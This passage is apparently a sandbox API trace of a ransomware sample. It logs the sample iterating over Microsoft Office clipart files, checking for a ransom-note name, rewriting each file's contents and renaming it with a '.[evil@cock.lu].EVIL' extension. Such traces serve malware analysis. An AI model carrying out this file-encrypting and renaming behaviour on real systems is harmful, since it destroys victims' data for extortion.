??_V@YAXPEAX@Z () returned 0x1 [0157.195] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386764.JPG", dwFileAttributes=0x200) returned 0 [0157.195] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.195] wcsstr (_Str="J0387337.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.195] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG") returned 69 [0157.195] wcscmp (_String1="J0387337.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.195] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0387337.JPG") returned 0x0 [0157.195] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG") returned 0x45 [0157.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387337.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.198] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcb0a, lpOverlapped=0x0) returned 1 [0157.206] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.206] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.206] _errno () returned 0x84b1160840 [0157.206] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.206] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xcb20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xcb20, lpOverlapped=0x0) returned 1 [0157.206] CloseHandle (hObject=0x1a8) returned 1 [0157.206] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.206] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.206] __uncaught_exception () returned 0x84b1160800 [0157.207] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.207] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387337.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387337.jpg.[evil@cock.lu].evil")) returned 1 [0157.208] ??_V@YAXPEAX@Z () returned 0x1 [0157.210] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387337.JPG", dwFileAttributes=0x200) returned 0 [0157.211] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.211] wcsstr (_Str="J0387578.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.211] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG") returned 69 [0157.211] wcscmp (_String1="J0387578.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.211] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0387578.JPG") returned 0x0 [0157.211] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG") returned 0x45 [0157.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387578.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.213] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6cec, lpOverlapped=0x0) returned 1 [0157.227] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.227] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.227] _errno () returned 0x84b1160840 [0157.227] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.227] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x6d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6d00, lpOverlapped=0x0) returned 1 [0157.228] CloseHandle (hObject=0x1a8) returned 1 [0157.228] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.228] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.228] __uncaught_exception () returned 0x84b1160800 [0157.228] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.228] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387578.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387578.jpg.[evil@cock.lu].evil")) returned 1 [0157.229] ??_V@YAXPEAX@Z () returned 0x1 [0157.232] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387578.JPG", dwFileAttributes=0x200) returned 0 [0157.233] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.233] wcsstr (_Str="J0387591.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.233] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG") returned 69 [0157.233] wcscmp (_String1="J0387591.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.233] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0387591.JPG") returned 0x0 [0157.233] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG") returned 0x45 [0157.233] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387591.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.235] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x98c7, lpOverlapped=0x0) returned 1 [0157.242] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.242] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.242] _errno () returned 0x84b1160840 [0157.242] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.242] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x98e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x98e0, lpOverlapped=0x0) returned 1 [0157.243] CloseHandle (hObject=0x1a8) returned 1 [0157.243] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.243] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.243] __uncaught_exception () returned 0x84b1160800 [0157.243] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.243] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387591.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387591.jpg.[evil@cock.lu].evil")) returned 1 [0157.244] ??_V@YAXPEAX@Z () returned 0x1 [0157.247] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387591.JPG", dwFileAttributes=0x200) returned 0 [0157.247] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.247] wcsstr (_Str="J0387604.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.247] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG") returned 69 [0157.247] wcscmp (_String1="J0387604.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.247] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0387604.JPG") returned 0x0 [0157.247] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG") returned 0x45 [0157.247] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387604.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.250] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb9bf, lpOverlapped=0x0) returned 1 [0157.259] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.259] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.259] _errno () returned 0x84b1160840 [0157.259] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.259] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xb9c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb9c0, lpOverlapped=0x0) returned 1 [0157.260] CloseHandle (hObject=0x1a8) returned 1 [0157.260] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.260] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.260] __uncaught_exception () returned 0x84b1160800 [0157.260] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.260] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387604.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387604.jpg.[evil@cock.lu].evil")) returned 1 [0157.262] ??_V@YAXPEAX@Z () returned 0x1 [0157.265] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387604.JPG", dwFileAttributes=0x200) returned 0 [0157.266] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.266] wcsstr (_Str="J0387882.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.266] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG") returned 69 [0157.266] wcscmp (_String1="J0387882.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.266] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0387882.JPG") returned 0x0 [0157.266] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG") returned 0x45 [0157.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387882.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.268] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x98ec, lpOverlapped=0x0) returned 1 [0157.281] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.281] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.281] _errno () returned 0x84b1160840 [0157.282] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.282] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x9900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9900, lpOverlapped=0x0) returned 1 [0157.282] CloseHandle (hObject=0x1a8) returned 1 [0157.282] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.282] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.282] __uncaught_exception () returned 0x84b1160800 [0157.282] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.282] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387882.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387882.jpg.[evil@cock.lu].evil")) returned 1 [0157.283] ??_V@YAXPEAX@Z () returned 0x1 [0157.286] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387882.JPG", dwFileAttributes=0x200) returned 0 [0157.286] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.286] wcsstr (_Str="J0387895.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.286] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG") returned 69 [0157.286] wcscmp (_String1="J0387895.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.286] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0387895.JPG") returned 0x0 [0157.286] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG") returned 0x45 [0157.286] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387895.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.289] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7df3, lpOverlapped=0x0) returned 1 [0157.308] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.308] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.308] _errno () returned 0x84b1160840 [0157.308] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.308] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7e00, lpOverlapped=0x0) returned 1 [0157.308] CloseHandle (hObject=0x1a8) returned 1 [0157.308] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.309] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.309] __uncaught_exception () returned 0x84b1160800 [0157.309] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.309] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387895.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0387895.jpg.[evil@cock.lu].evil")) returned 1 [0157.310] ??_V@YAXPEAX@Z () returned 0x1 [0157.313] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0387895.JPG", dwFileAttributes=0x200) returned 0 [0157.313] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.313] wcsstr (_Str="J0390072.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.313] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG") returned 69 [0157.313] wcscmp (_String1="J0390072.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.313] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0390072.JPG") returned 0x0 [0157.313] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG") returned 0x45 [0157.313] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0390072.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.315] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x351c, lpOverlapped=0x0) returned 1 [0157.328] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.328] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.328] _errno () returned 0x84b1160840 [0157.328] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.328] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x3520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3520, lpOverlapped=0x0) returned 1 [0157.328] CloseHandle (hObject=0x1a8) returned 1 [0157.328] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.328] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.328] __uncaught_exception () returned 0x84b1160800 [0157.328] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.329] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0390072.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0390072.jpg.[evil@cock.lu].evil")) returned 1 [0157.330] ??_V@YAXPEAX@Z () returned 0x1 [0157.333] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0390072.JPG", dwFileAttributes=0x200) returned 0 [0157.333] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.333] wcsstr (_Str="J0400001.PNG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.333] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG") returned 69 [0157.333] wcscmp (_String1="J0400001.PNG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0157.333] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0400001.PNG") returned 0x0 [0157.333] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG") returned 0x45 [0157.333] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400001.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0157.336] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x31883, lpOverlapped=0x0) returned 1 [0157.375] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.375] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0157.375] _errno () returned 0x84b1160840 [0157.375] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.375] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x318a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x318a0, lpOverlapped=0x0) returned 1 [0157.376] CloseHandle (hObject=0x1a8) returned 1 [0157.376] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0157.376] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0157.376] __uncaught_exception () returned 0x84b1160800 [0157.376] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0157.377] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400001.png"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0400001.png.[evil@cock.lu].evil")) returned 1 [0157.377] ??_V@YAXPEAX@Z () returned 0x1 [0157.380] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400001.PNG", dwFileAttributes=0x200) returned 0 [0157.380] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0157.380] wcsstr (_Str="J0400002.PNG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0157.380] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0400002.PNG") returned 69 